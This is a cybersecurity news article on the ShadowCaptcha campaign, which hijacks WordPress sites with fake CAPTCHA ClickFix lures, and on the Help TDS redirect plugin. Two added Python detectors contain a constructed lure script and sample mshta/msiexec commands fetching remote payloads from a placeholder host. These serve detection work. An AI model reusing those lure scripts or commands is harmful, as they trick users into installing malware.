Cyber Web Spider Blog – News
ShadowCaptcha Exploits WordPress Sites to Spread Ransomware, Info Stealers, and Crypto Miners

Posted on August 26, 2025 By CWS

A new large-scale campaign has been observed exploiting over 100 compromised WordPress sites to direct site visitors to fake CAPTCHA verification pages that employ the ClickFix social engineering tactic to deliver information stealers, ransomware, and cryptocurrency miners.
The large-scale cybercrime campaign, first detected in August 2025, has been codenamed ShadowCaptcha by the Israel National Digital Agency.
“The campaign […] blends social engineering, living-off-the-land binaries (LOLBins), and multi-stage payload delivery to gain and maintain a foothold in targeted systems,” researchers Shimi Cohen, Adi Pick, Idan Beit Yosef, Hila David, and Yaniv Goldman said.
“The ultimate goals of ShadowCaptcha are collecting sensitive information via credential harvesting and browser data exfiltration, deploying cryptocurrency miners to generate illicit profits, and even causing ransomware outbreaks.”
The attacks begin with unsuspecting users visiting a compromised WordPress site that has been injected with malicious JavaScript code responsible for initiating a redirection chain that takes them to a fake Cloudflare or Google CAPTCHA page.
From there, the attack chain forks into two, depending on the ClickFix instructions displayed on the web page: one that uses the Windows Run dialog and another that guides the victim to save a page as an HTML Application (HTA) and then run it using mshta.exe.

The execution flow triggered via the Windows Run dialog culminates in the deployment of Lumma and Rhadamanthys stealers via MSI installers launched using msiexec.exe or via remotely-hosted HTA files run using mshta.exe, whereas the execution of the saved HTA payload results in the installation of Epsilon Red ransomware.
It's worth pointing out that the use of ClickFix lures to trick users into downloading malicious HTA files for spreading Epsilon Red ransomware was documented last month by CloudSEK.
“The compromised ClickFix page automatically executes obfuscated JavaScript that uses ‘navigator.clipboard.writeText’ to copy a malicious command to the user’s clipboard without any interaction, relying on users to paste and run it unknowingly,” the researchers said.
The attacks are characterized by the use of anti-debugger techniques to prevent inspection of web pages using browser developer tools, while also relying on DLL side-loading to execute malicious code under the guise of legitimate processes.
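A site owner or scanner can look for the combination of traits the article names in an injected page (a clipboard write, a LOLBin in script, a Win+R lure, fake CAPTCHA text, a `debugger;` anti-inspection loop, an HTA reference). The following is an added example, not code from the article or the Israel National Digital Agency; the sample pages, indicator weights and threshold are assumptions constructed for illustration.

```python
import re

# Constructed sample of what an injected ClickFix lure on a compromised WordPress
# page might look like, reduced to the traits the article names. Not real
# campaign code; the URL is a placeholder.
SAMPLE_INJECTED = """
<div class="cf-verify">Verify you are human: press Win+R, then Ctrl+V, then Enter</div>
<script>
setInterval(function(){debugger;},100);
document.addEventListener('click',function(){
  navigator.clipboard.writeText("mshta https://placeholder.invalid/verify.hta");
});
</script>
"""

# Constructed benign page: a legitimate "copy link" button also writes the clipboard,
# so a single indicator must not be enough to flag a page.
SAMPLE_CLEAN = """
<p>Share this post</p>
<script>
document.querySelector('#copy').onclick = () =>
  navigator.clipboard.writeText(window.location.href);
</script>
"""

# (name, weight, pattern). Weights are assumptions, chosen so that a page needs
# more than one ClickFix trait before it crosses THRESHOLD.
INDICATORS = [
    ("clipboard_write", 2, re.compile(r"navigator\.clipboard\.writeText", re.I)),
    ("lolbin_in_script", 3, re.compile(r"\b(mshta|msiexec|powershell)(\.exe)?\b", re.I)),
    ("run_dialog_lure", 2, re.compile(r"win\s*\+\s*r\b", re.I)),
    ("fake_captcha_text", 1, re.compile(r"verify\s+you\s+are\s+(a\s+)?human", re.I)),
    ("anti_debugger", 2, re.compile(r"\bdebugger\s*;", re.I)),
    ("hta_reference", 3, re.compile(r"\.hta\b", re.I)),
]
THRESHOLD = 5

def score_page(html: str) -> tuple:
    """Return (score, [indicator names]) for one page's HTML/JS."""
    hits = [name for name, _, rx in INDICATORS if rx.search(html)]
    score = sum(w for name, w, _ in INDICATORS if name in hits)
    return score, hits

def is_clickfix_lure(html: str) -> bool:
    return score_page(html)[0] >= THRESHOLD

if __name__ == "__main__":
    for label, page in (("injected", SAMPLE_INJECTED), ("clean", SAMPLE_CLEAN)):
        score, hits = score_page(page)
        print(f"{label}: score={score} hits={hits} flagged={is_clickfix_lure(page)}")
```

Run it against the rendered output of each page (theme files, `wp_options` injections and uploaded JS included), since the injected script may be assembled at request time rather than sitting in one file.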

Select ShadowCaptcha campaigns have been observed delivering an XMRig-based cryptocurrency miner, with some variants fetching the mining configuration from a Pastebin URL rather than hard-coding it in the malware, thus allowing the operators to adjust the parameters on the fly.
In cases where the miner payloads are deployed, the attackers have also been observed dropping a vulnerable driver (“WinRing0x64.sys”) to achieve kernel-level access and interact with CPU registers with the aim of improving mining efficiency.
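On the endpoint side, the two execution paths above (mshta.exe or msiexec.exe launched from the Run dialog with a remote URL, or a saved .hta run through mshta.exe) and the WinRing0x64.sys driver drop all leave process-creation and driver-load telemetry. This added example, not code from the article or the researchers, classifies constructed Sysmon-style events; the hosts, paths and URLs are placeholders, and the parent-process check assumes Run-dialog launches appear as children of explorer.exe.

```python
import re
from typing import Iterable, List, Optional, Tuple

# Constructed Sysmon-style events (simplified fields) mirroring the two execution
# paths in the article plus the driver drop. Hosts, paths and URLs are placeholders.
EVENTS = [
    {"type": "process", "host": "ws01", "parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\mshta.exe",
     "cmdline": "mshta https://placeholder.invalid/verify.hta"},
    {"type": "process", "host": "ws02", "parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\msiexec.exe",
     "cmdline": "msiexec /i https://placeholder.invalid/update.msi /qn"},
    {"type": "process", "host": "ws03", "parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\mshta.exe",
     "cmdline": r'mshta "C:\Users\alice\Downloads\verify.hta"'},
    {"type": "process", "host": "ws04", "parent": r"C:\Windows\System32\services.exe",
     "image": r"C:\Windows\System32\msiexec.exe", "cmdline": "msiexec /V"},
    {"type": "driver", "host": "ws02", "image": r"C:\ProgramData\tmp\WinRing0x64.sys"},
]

LOLBINS = ("mshta.exe", "msiexec.exe")
REMOTE_URL = re.compile(r"\bhttps?://", re.I)
LOCAL_HTA = re.compile(r'[a-z]:\\[^"\s]*\.hta\b', re.I)

def basename(path: str) -> str:
    return path.lower().rsplit("\\", 1)[-1]

def classify(ev: dict) -> Optional[str]:
    """Name the finding for one event, or None if it looks benign."""
    if ev["type"] == "driver":
        # The article names WinRing0x64.sys as the vulnerable driver dropped for mining.
        return "vulnerable_driver_load" if basename(ev["image"]) == "winring0x64.sys" else None
    image, parent = basename(ev["image"]), basename(ev["parent"])
    # Run-dialog launches are children of explorer.exe; service-launched msiexec is not.
    if image not in LOLBINS or parent != "explorer.exe":
        return None
    if REMOTE_URL.search(ev["cmdline"]):
        return "clickfix_run_dialog_remote_payload"
    if image == "mshta.exe" and LOCAL_HTA.search(ev["cmdline"]):
        return "clickfix_saved_hta_execution"
    return None

def detect(events: Iterable[dict]) -> List[Tuple[str, str]]:
    """(host, finding) pairs in event order, benign events skipped."""
    return [(ev["host"], f) for ev in events if (f := classify(ev))]

if __name__ == "__main__":
    for host, finding in detect(EVENTS):
        print(f"{host}: {finding}")
```

The driver rule should be backed by a hash or signer check in production, because the file can be renamed; a blocklist such as Microsoft's vulnerable driver blocklist covers this class of driver.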
Of the infected WordPress sites, a majority are located in Australia, Brazil, Italy, Canada, Colombia, and Israel, spanning the technology, hospitality, legal/finance, healthcare, and real estate sectors.
Exactly how these WordPress sites are compromised is not known. However, Goldman told The Hacker News there is medium confidence that the attackers obtained access via various known exploits in a variety of plugins, and in some instances through the WordPress portal with compromised credentials.
To mitigate the risks posed by ShadowCaptcha, it's essential to train users to watch out for ClickFix campaigns, segment networks to prevent lateral movement, and ensure WordPress sites are kept up-to-date and secured using multi-factor authentication (MFA) protections.
“ShadowCaptcha shows how social-engineering attacks have evolved into full-spectrum cyber operations,” the researchers said. “By tricking users into running built-in Windows tools and layering obfuscated scripts and vulnerable drivers, operators gain stealthy persistence and can pivot between data theft, crypto mining, or ransomware.”
The disclosure comes as GoDaddy detailed the evolution of Help TDS, a traffic distribution (or direction) system that has been active since 2017 and has been linked to malicious schemes like VexTrio Viper. Help TDS provides partners and affiliates with PHP code templates that are injected into WordPress sites, ultimately directing users to malicious destinations based on the targeting criteria.

“The operation focuses on tech support scams using full-screen browser manipulation and exit prevention techniques to trap victims on fraudulent Microsoft Windows security alert pages, with fallback monetization via dating, cryptocurrency, and sweepstakes scams,” security researcher Denis Sinegubko said.
Some of the notable malware campaigns that have leveraged Help TDS in recent years include DollyWay, Balada Injector, and DNS TXT redirects. The scam pages, for their part, use JavaScript to force browsers into full-screen mode and display the fraudulent alert, and even feature counterfeit CAPTCHA challenges before rendering them in a bid to sidestep automated security scanners.

Help TDS operators are said to have developed a malicious WordPress plugin called “woocommerce_inputs” between late 2024 and August 2025 to enable the redirection functionality, alongside gradually adding credential harvesting, geographic filtering, and advanced evasion techniques. The plugin is estimated to be installed on over 10,000 sites worldwide.
The malicious plugin masquerades as WooCommerce to evade detection by site owners. It is exclusively installed by attackers after compromising WordPress sites via stolen administrator credentials.
“This plugin serves as both a traffic monetization tool and credential harvesting mechanism, demonstrating continuous evolution from simple redirect functionality to a sophisticated malware-as-a-service offering,” GoDaddy said.
“By providing ready-made solutions including C2 infrastructure, standardized PHP injection templates, and fully-featured malicious WordPress plugins, Help TDS has lowered the barrier to entry for cybercriminals seeking to monetize infiltrated websites.”

The Hacker News Tags:Crypto, Exploits, Info, Miners, Ransomware, ShadowCaptcha, Sites, Spread, Stealers, WordPress
